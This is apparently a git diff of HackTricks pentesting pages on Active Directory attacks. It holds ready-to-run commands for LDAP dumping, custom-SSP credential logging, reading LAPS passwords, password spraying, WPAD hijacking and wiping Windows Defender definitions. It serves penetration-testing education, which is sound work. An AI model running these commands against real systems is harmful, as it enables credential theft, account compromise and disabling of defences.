According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
|
||||
|
||||
```bash
|
||||
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
||||
```
|
||||
|
||||
## Valid Credentials
|
||||
|
||||
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
|
||||
|
||||
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
|
||||
|
||||
```bash
|
||||
pip3 install ldapdomaindump
|
||||
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
|
||||
```
|
||||
|
||||
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
|
||||
|
||||
### Manual
|
||||
|
||||
#### ldapsearch
|
||||
|
||||
Check null credentials or if your credentials are valid:
|
||||
|
||||
|
|
|
@ -294,7 +294,12 @@ Commands:
|
|||
### Domain Shared Folders Search
|
||||
|
||||
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
|
||||
* Or [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
|
||||
|
||||
```bash
|
||||
Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
||||
```
|
||||
|
||||
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
|
||||
* `-M spider_plus [--share <share_name>]`
|
||||
* `--pattern txt`
|
||||
|
||||
|
|
|
@ -219,10 +219,19 @@ Now that you have some basic credentials you should check if you can **find** an
|
|||
You can get help from automatic tools such as:
|
||||
|
||||
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
|
||||
* Or [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
|
||||
|
||||
```bash
|
||||
Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
||||
```
|
||||
|
||||
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
|
||||
* `-M spider_plus [--share <share_name>]`
|
||||
* `--pattern txt`
|
||||
|
||||
```bash
|
||||
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
||||
```
|
||||
|
||||
Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
|
||||
|
||||
### Steal NTLM Creds
|
||||
|
|
|
@ -1,23 +1,28 @@
|
|||
# Custom SSP
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
## Custom SSP
|
||||
|
||||
# Custom SSP
|
||||
|
||||
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
|
||||
You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
|
||||
|
||||
#### Mimilib
|
||||
### Mimilib
|
||||
|
||||
You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\
|
||||
Drop the dll in `C:\Windows\System32\`\
|
||||
|
@ -40,7 +45,7 @@ PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packag
|
|||
|
||||
And after a reboot all credentials can be found in clear text in `C:\Windows\System32\kiwissp.log`
|
||||
|
||||
#### In memory
|
||||
### In memory
|
||||
|
||||
You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):
|
||||
|
||||
|
@ -51,18 +56,25 @@ misc::memssp
|
|||
|
||||
This won't survive reboots.
|
||||
|
||||
### Mitigation
|
||||
## Mitigation
|
||||
|
||||
Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -4,11 +4,15 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -16,7 +20,7 @@
|
|||
|
||||
**LAPS** allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES.
|
||||
|
||||
When using LAPS, **2 new attributes** appear in the **computer** objects of the domain: **`ms-msc-AdmPwd`** and **`ms-mcs-AdmPwdExpirationTime`**_._ These attributes contains the **plain-text admin password and the expiration time**. Then, in a domain environment, it could be interesting to check **which users can read** these attributes.
|
||||
When using LAPS, 2 new attributes appear in the computer objects of the domain: _ms-msc-AdmPwd_ and _ms-mcs-AdmPwdExpirationTime._ These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes.
|
||||
|
||||
### Check if activated
|
||||
|
||||
|
@ -70,35 +74,7 @@ Get-AdmPwdPassword -ComputerName wkstn-2 | fl
|
|||
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
|
||||
```
|
||||
|
||||
### LAPSToolkit
|
||||
|
||||
The [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) facilitates the enumeration of LAPS this with several functions.\
|
||||
One is parsing **`ExtendedRights`** for **all computers with LAPS enabled.** This will show **groups** specifically **delegated to read LAPS passwords**, which are often users in protected groups.\
|
||||
An **account** that has **joined a computer** to a domain receives `All Extended Rights` over that host, and this right gives the **account** the ability to **read passwords**. Enumeration may show a user account that can read the LAPS password on a host. This can help us **target specific AD users** who can read LAPS passwords.
|
||||
|
||||
```powershell
|
||||
# Get groups that can read passwords
|
||||
Find-LAPSDelegatedGroups
|
||||
|
||||
OrgUnit Delegated Groups
|
||||
------- ----------------
|
||||
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain Admins
|
||||
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin
|
||||
|
||||
# Checks the rights on each computer with LAPS enabled for any groups
|
||||
# with read access and users with "All Extended Rights"
|
||||
Find-AdmPwdExtendedRights
|
||||
ComputerName Identity Reason
|
||||
------------ -------- ------
|
||||
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins Delegated
|
||||
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated
|
||||
|
||||
# Get computers with LAPS enabled, expirations time and the password (if you have access)
|
||||
Get-LAPSComputers
|
||||
ComputerName Password Expiration
|
||||
------------ -------- ----------
|
||||
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
|
||||
```
|
||||
Finally, [**LAPSToolkit**](https://github.com/leoloobeek/LAPSToolkit) **can also be useful for the same purpose.**
|
||||
|
||||
## **LAPS Persistence**
|
||||
|
||||
|
@ -129,10 +105,14 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -59,10 +59,6 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## References
|
||||
|
||||
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
|
||||
|
||||
<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">
|
||||
|
||||
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.
|
||||
|
|
|
@ -4,11 +4,15 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -23,74 +27,37 @@ Notice that you **could lockout some accounts if you try several wrong passwords
|
|||
|
||||
### Get password policy
|
||||
|
||||
If you have some user credentials or a shell as a domain user you can **get the password policy with**:
|
||||
If you have some user credentials or a shell as a domain user you can get the password policy with:
|
||||
|
||||
```bash
|
||||
# From Linux
|
||||
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
|
||||
* `crackmapexec <IP> -u 'user' -p 'password' --pass-pol`
|
||||
* `enum4linx -u 'username' -p 'password' -P <IP>`
|
||||
* `(Get-DomainPolicy)."SystemAccess" #From powerview`
|
||||
|
||||
enum4linx -u 'username' -p 'password' -P <IP>
|
||||
### Exploitation
|
||||
|
||||
rpcclient -U "" -N 10.10.10.10;
|
||||
rpcclient $>querydominfo
|
||||
|
||||
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
|
||||
|
||||
# From Windows
|
||||
net accounts
|
||||
|
||||
(Get-DomainPolicy)."SystemAccess" #From powerview
|
||||
```
|
||||
|
||||
### Exploitation from Linux (or all)
|
||||
|
||||
* Using **crackmapexec:**
|
||||
Using **crackmapexec:**
|
||||
|
||||
```bash
|
||||
crackmapexec smb <IP> -u users.txt -p passwords.txt
|
||||
# Local Auth Spray (once you found some local admin pass or hash)
|
||||
## --local-auth flag indicate to only try 1 time per machine
|
||||
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
|
||||
```
|
||||
|
||||
* Using [**kerbrute**](https://github.com/ropnop/kerbrute) **** (Go)
|
||||
|
||||
```bash
|
||||
# Password Spraying
|
||||
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
|
||||
# Brute-Force
|
||||
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
|
||||
```
|
||||
|
||||
* [_**spray**_](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_
|
||||
|
||||
```bash
|
||||
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
|
||||
```
|
||||
|
||||
* Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
|
||||
Using [kerbrute](https://github.com/TarlogicSecurity/kerbrute)(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
|
||||
|
||||
```bash
|
||||
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
|
||||
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
|
||||
```
|
||||
|
||||
* With the `scanner/smb/smb_login` module of **Metasploit**:
|
||||
**Kerbrute** also tells if a username is valid.
|
||||
|
||||
![](<../../.gitbook/assets/image (132) (1).png>)
|
||||
|
||||
* Using **rpcclient**:
|
||||
Using [kerbrute](https://github.com/ropnop/kerbrute)(Go)
|
||||
|
||||
```bash
|
||||
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
|
||||
for u in $(cat users.txt); do
|
||||
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
|
||||
done
|
||||
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
|
||||
```
|
||||
|
||||
#### From Windows
|
||||
|
||||
* With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
|
||||
With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
|
||||
|
||||
```bash
|
||||
# with a list of users
|
||||
|
@ -100,21 +67,31 @@ done
|
|||
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
|
||||
```
|
||||
|
||||
* With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it):
|
||||
With the `scanner/smb/smb_login` module of Metasploit:
|
||||
|
||||
```powershell
|
||||
![](<../../.gitbook/assets/image (132) (1).png>)
|
||||
|
||||
With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
|
||||
|
||||
```bash
|
||||
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
|
||||
```
|
||||
|
||||
* With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)****
|
||||
or **spray** (read next section).
|
||||
|
||||
```
|
||||
Invoke-SprayEmptyPassword
|
||||
### Lockout check
|
||||
|
||||
The best way is not to try with more than 5/7 passwords per account.
|
||||
|
||||
So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_
|
||||
|
||||
```bash
|
||||
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
|
||||
```
|
||||
|
||||
## Outlook Web Access
|
||||
|
||||
There are multiples tools for p**assword spraying outlook**.
|
||||
There are multiples tools for password spraying outlook.
|
||||
|
||||
* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/)
|
||||
* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/)
|
||||
|
@ -125,15 +102,25 @@ There are multiples tools for p**assword spraying outlook**.
|
|||
To use any of these tools, you need a user list and a password / a small list of passwords to spray.
|
||||
|
||||
```bash
|
||||
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
|
||||
$ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
|
||||
[x] Failed: larsson:Summer2020
|
||||
[x] Failed: cube0x0:Summer2020
|
||||
[x] Failed: a.admin:Summer2020
|
||||
[x] Failed: c.cube:Summer2020
|
||||
[+] Success: s.svensson:Summer2020
|
||||
[x] Failed: s.sven:Summer2020
|
||||
[x] Failed: j.jenny:Summer2020
|
||||
[x] Failed: t.teresa:Summer2020
|
||||
[x] Failed: t.trump:Summer2020
|
||||
[x] Failed: a.adams:Summer2020
|
||||
[x] Failed: l.larsson:Summer2020
|
||||
[x] Failed: CUBE0X0:Summer2020
|
||||
[x] Failed: A.ADMIN:Summer2020
|
||||
[x] Failed: C.CUBE:Summer2020
|
||||
[+] Success: S.SVENSSON:Summer2020
|
||||
```
|
||||
|
||||
## References
|
||||
## References :
|
||||
|
||||
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
|
||||
* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
|
||||
|
@ -144,10 +131,14 @@ To use any of these tools, you need a user list and a password / a small list of
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -261,11 +261,8 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab
|
|||
|
||||
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
|
||||
|
||||
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.
|
||||
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\
|
||||
|
||||
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
|
||||
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## **AD Recycle Bin**
|
||||
|
||||
|
|
|
@ -110,10 +110,15 @@ NISEngineVersion : 0.0.0.0
|
|||
</strong>RealTimeScanDirection : 0
|
||||
PSComputerName :</code></pre>
|
||||
|
||||
You could also run:
|
||||
To enumerate it you could also run:
|
||||
|
||||
```bash
|
||||
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
|
||||
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
|
||||
wmic /namespace:\\root\securitycenter2 path antivirusproduc
|
||||
sc query windefend
|
||||
|
||||
#Delete all rules of Defender (useful for machines without internet access)
|
||||
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
```
|
||||
|
||||
## EFS (Encrypted File System)
|
